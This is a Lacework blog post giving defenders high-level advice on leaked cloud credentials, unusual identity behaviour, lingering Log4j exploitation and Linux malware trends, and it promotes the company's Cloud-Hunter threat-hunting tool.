How can defenders catch security vulnerabilities before attackers do?

Security vulnerabilities are inevitable, and attackers and defenders are in a never-ending race to discover them first. As soon as we find a new attack technique, a bad actor is looking for the next one. Attackers are getting to your firm’s valuable assets faster thanks to new tools, automation, and more opportunities to move through your cloud environment unnoticed.

To protect the organisation’s most important data and systems, you will need to identify what bad actors want and how they try to get it. Based on the trends the Lacework Labs team discovered while conducting research for our Cloud Threat Report, we have a few tips to help you find security flaws before bad actors can take advantage of them.

How are attackers moving so fast?

Attackers are able to quickly breach your environment because they’re noticing your mistakes before you do. They’re constantly scanning your systems for misconfigurations and monitoring your repositories for hard-coded secrets. For instance, if a developer on your team accidentally commits an AWS access key in a public GitHub repository, even just for a few minutes, you might assume that it’s not a problem because you caught the error quickly.

But, this is exactly what attackers want—they only need a few minutes to obtain that key before you even know there is a problem. Access keys are long-term credentials that allow users to access your resources. If an attacker obtains them, they can access your network and data, which is how they take control of your systems, compromise employee data, or steal financial information. We’re noticing this trend gaining momentum with attackers.

They’re compromising systems at a rapid pace, which suggests that they’re using automation tools to scan new code commits in public repositories for those access keys. It’s a low-effort crime that enables them to quickly gain privileged access.

Look for unusual behaviour, even from trusted users

As firms move much of their data and operations to the cloud, they also create increasingly more identities, both human and non-human. Human identities are people, for example, security analysts and developers, and non-human identities are apps or service accounts that make decisions on behalf of people. Non-human identities are a particularly attractive target for attackers because these accounts provide access to large amounts of sensitive data.

With the many identities in your firm’s cloud with different privilege levels, attackers can go undetected until they reach their targets. They appear to be authorised users because they’re using the credentials of someone at your firm so unless abnormal behaviour is detected and they often aren’t noticed until they’ve found what they were looking for. Knowing what normal behaviour looks like will help you find users who are performing in unusual ways.

Avoid the distractions: New problems don’t erase old ones

As we continue to encounter new security issues, like the recent OpenSSL vulnerability, Log4j is no longer the primary concern. But attackers haven’t forgotten about Log4j, and they won’t for a while. We still see bad actors scanning for and exploiting the Log4j vulnerability, most of which is facilitated by out-of-band application security testing (OAST) tools.

OAST is a method used to discover known, exploitable vulnerabilities in web apps, and OAST tools make this process easier for attackers. We expect that attackers will use them to their advantage and look for unresolved Log4j vulnerabilities for months, maybe years, to come. Even if you weren’t originally impacted, it’s crucial to monitor this issue. As new vulnerabilities outshine these existing ones, attackers will try to take advantage of your distraction.

Expect the unexpected: Techniques are ever changing

Attackers constantly refine and improve their techniques in an effort to outsmart defenders. Not only do they look for ways to exploit new tools and technologies, but they also try to find alternative and more impactful ways to attack popular, well-established software.

Linux, the most popular open-source operating system, is a prime target for bad actors as it’s the foundation of and integral to many businesses’ operations. The little information available about Linux malware makes it even easier for attackers to deploy it undetected.

Today, Linux malware is becoming more sophisticated. Our Labs team recently observed Linux malware using steganography techniques, which is a method cyber-attackers use to hide information in a seemingly ordinary medium like an image. Another instance where we saw improved attack techniques was CVE-2022-26134, a widely exploited zero-day vulnerability in Atlassian’s Confluence Server and Data Center products.

While Atlassian is a popular target for attackers, this exploit was notable because it was much more impactful than previous vulnerabilities within the platform. We are continuing to see a substantial increase in malware and the scope of attacks within Atlassian, and we can likely expect the scale to continue to increase as attackers improve their abilities.

Gather and explore data to see what’s happening

To stay ahead of attackers, you need to look at your environment from a risk-based perspective. What does your business prioritise? That’s what attackers want to find—the data and systems that keep your firm running. What’s important to you, is a target for them.

Knowing which assets cyber-attackers might try to compromise or target and understanding their techniques can help you identify their attack paths. While patching all vulnerabilities would be ideal, it’s just not possible. Understanding where vulnerabilities are and fixing the most critical ones can keep bad actors away from the assets you need the most.

The key to prioritising those vulnerabilities is data. When you have high-quality data from your environment, you can contextualise abnormal events faster and more accurately.

Use technology to your advantage

Technology can help you collect and analyse data faster. But to do so, you need to use the right tools for the right tasks. Automation should replace repetitive work, like scanning logs for certain IP addresses. Machine learning can help identify and prioritise anomalous behaviour. Visualisation tools can help you sort and understand large data sets. Regardless of how advanced a tool is, it won’t be accurate or helpful without sufficient data.

The Lacework  team developed an open-source tool, Cloud-Hunter, to help us find threats within the Lacework Polygraph Data Platform. Lacework Query Language (LQL) is our custom programming language that we use to search and retrieve the data that Lacework gathers from our users’ cloud environments. Prior to developing Cloud-Hunter, we used LQL in combination with another platform to create new policies and produce alerts.

As we spent more time threat hunting, we decided to create a tool to simplify queries and make hunting easier, which is why we developed Cloud-Hunter. While we originally used it only among the Lacework Labs team, we realised that our customers could benefit from the tool as well. With Cloud-Hunter, you can explore data in your environment, validate assumptions, respond to incidents, and create custom policies unique to your environment.

Learn more about attackers’ tactics

It’s not easy to find security vulnerabilities but understanding attack techniques and what’s going on in your environment can make protecting your organisation’s assets much easier. To learn more about Cloud-Hunter, how it can help you, and to understand the tactics attackers are using and how to protect your business, read our most recent Cloud Threat Report.

Richard Davies is the Area Director for Australia and New Zealand at Lacework.